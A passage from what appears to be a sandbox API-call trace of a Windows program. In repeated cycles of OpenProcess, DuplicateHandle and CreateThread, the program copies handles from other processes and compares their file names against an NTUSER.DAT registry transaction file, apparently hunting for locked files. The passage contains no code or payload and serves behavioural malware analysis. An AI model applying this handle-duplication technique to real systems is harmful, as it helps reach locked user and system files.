out: lpThreadId=0x0) returned 0x1e4 [0166.074] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.075] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.075] CloseHandle (hObject=0x1e4) returned 1 [0166.075] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0166.075] CloseHandle (hObject=0x194) returned 1 [0166.075] CloseHandle (hObject=0x1e8) returned 1 [0166.075] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.075] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.075] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.076] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.077] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.077] CloseHandle (hObject=0x1e4) returned 1 [0166.077] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0166.077] CloseHandle (hObject=0x194) returned 1 [0166.077] CloseHandle (hObject=0x1e8) returned 1 [0166.078] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.078] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x274, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.078] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.078] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.079] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.079] CloseHandle (hObject=0x1e4) returned 1 [0166.079] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0166.079] CloseHandle (hObject=0x194) returned 1 [0166.079] CloseHandle (hObject=0x1e8) returned 1 [0166.079] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.079] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.080] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.080] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.081] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.081] CloseHandle (hObject=0x1e4) returned 1 [0166.081] CloseHandle (hObject=0x194) returned 1 [0166.081] CloseHandle (hObject=0x1e8) returned 1 [0166.081] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.081] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x454, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.081] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.083] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.087] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.087] CloseHandle (hObject=0x1e4) returned 1 [0166.087] CloseHandle (hObject=0x194) returned 1 [0166.087] CloseHandle (hObject=0x1e8) returned 1 [0166.087] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.087] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.087] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.088] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.092] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.092] CloseHandle (hObject=0x1e4) returned 1 [0166.092] CloseHandle (hObject=0x194) returned 1 [0166.092] CloseHandle (hObject=0x1e8) returned 1 [0166.092] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.092] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.092] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.093] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.093] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.093] CloseHandle (hObject=0x1e4) returned 1 [0166.094] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0166.094] CloseHandle (hObject=0x194) returned 1 [0166.094] CloseHandle (hObject=0x1e8) returned 1 [0166.094] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.094] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x570, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.095] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.095] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.095] CloseHandle (hObject=0x1e4) returned 1 [0166.095] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.095] CloseHandle (hObject=0x194) returned 1 [0166.096] CloseHandle (hObject=0x1e8) returned 1 [0166.096] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.096] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.096] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.097] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.098] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.098] CloseHandle (hObject=0x1e4) returned 1 [0166.098] _wcsicmp (_Str1="\\edb.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0166.098] CloseHandle (hObject=0x194) returned 1 [0166.098] CloseHandle (hObject=0x1e8) returned 1 [0166.098] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.098] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.098] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.099] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.100] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.100] CloseHandle (hObject=0x1e4) returned 1 [0166.100] _wcsicmp (_Str1="\\catdb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0166.100] CloseHandle (hObject=0x194) returned 1 [0166.100] CloseHandle (hObject=0x1e8) returned 1 [0166.100] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.100] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.100] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.102] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.106] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.106] CloseHandle (hObject=0x1e4) returned 1 [0166.106] _wcsicmp (_Str1="\\catdb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0166.106] CloseHandle (hObject=0x194) returned 1 [0166.106] CloseHandle (hObject=0x1e8) returned 1 [0166.106] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x444) returned 0x1e8 [0166.106] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.106] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.107] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.108] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.108] CloseHandle (hObject=0x1e4) returned 1 [0166.108] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.108] CloseHandle (hObject=0x194) returned 1 [0166.108] CloseHandle (hObject=0x1e8) returned 1 [0166.108] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.108] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.108] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.109] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.110] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.110] CloseHandle (hObject=0x1e4) returned 1 [0166.110] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.110] CloseHandle (hObject=0x194) returned 1 [0166.110] CloseHandle (hObject=0x1e8) returned 1 [0166.110] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.110] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.110] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.111] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.112] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.112] CloseHandle (hObject=0x1e4) returned 1 [0166.112] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.112] CloseHandle (hObject=0x194) returned 1 [0166.112] CloseHandle (hObject=0x1e8) returned 1 [0166.112] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.112] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.112] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.113] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.114] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.114] CloseHandle (hObject=0x1e4) returned 1 [0166.114] CloseHandle (hObject=0x194) returned 1 [0166.114] CloseHandle (hObject=0x1e8) returned 1 [0166.114] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.114] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x144, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.114] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.115] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.115] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.116] CloseHandle (hObject=0x1e4) returned 1 [0166.116] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.116] CloseHandle (hObject=0x194) returned 1 [0166.116] CloseHandle (hObject=0x1e8) returned 1 [0166.116] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.116] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x16c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.116] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.117] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.118] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.118] CloseHandle (hObject=0x1e4) returned 1 [0166.118] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.118] CloseHandle (hObject=0x194) returned 1 [0166.118] CloseHandle (hObject=0x1e8) returned 1 [0166.118] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.118] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.118] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.119] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.119] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.120] CloseHandle (hObject=0x1e4) returned 1 [0166.120] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.120] CloseHandle (hObject=0x194) returned 1 [0166.120] CloseHandle (hObject=0x1e8) returned 1 [0166.120] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.120] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x178, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.120] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.120] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.121] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.121] CloseHandle (hObject=0x1e4) returned 1 [0166.121] _wcsicmp (_Str1="\\amd64_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_0a1fd3a3a768b895", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.121] CloseHandle (hObject=0x194) returned 1 [0166.121] CloseHandle (hObject=0x1e8) returned 1 [0166.121] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.121] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x18c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.122] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.122] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.123] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.123] CloseHandle (hObject=0x1e4) returned 1 [0166.123] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.123] CloseHandle (hObject=0x194) returned 1 [0166.123] CloseHandle (hObject=0x1e8) returned 1 [0166.123] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.123] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.123] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.124] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.125] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.125] CloseHandle (hObject=0x1e4) returned 1 [0166.125] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.125] CloseHandle (hObject=0x194) returned 1 [0166.125] CloseHandle (hObject=0x1e8) returned 1 [0166.125] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.125] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.125] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.126] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.127] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.127] CloseHandle (hObject=0x1e4) returned 1 [0166.127] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.127] CloseHandle (hObject=0x194) returned 1 [0166.127] CloseHandle (hObject=0x1e8) returned 1 [0166.127] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.127] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x234, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.127] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.128] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.129] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.129] CloseHandle (hObject=0x1e4) returned 1 [0166.129] _wcsicmp (_Str1="\\thumbcache_idx.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.129] CloseHandle (hObject=0x194) returned 1 [0166.129] CloseHandle (hObject=0x1e8) returned 1 [0166.129] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.129] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x260, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.129] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.130] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.130] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.130] CloseHandle (hObject=0x1e4) returned 1 [0166.130] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.130] CloseHandle (hObject=0x194) returned 1 [0166.131] CloseHandle (hObject=0x1e8) returned 1 [0166.131] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.131] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x278, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.131] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.131] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.132] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.132] CloseHandle (hObject=0x1e4) returned 1 [0166.132] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.132] CloseHandle (hObject=0x194) returned 1 [0166.133] CloseHandle (hObject=0x1e8) returned 1 [0166.133] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.133] DuplicateHandle (in: 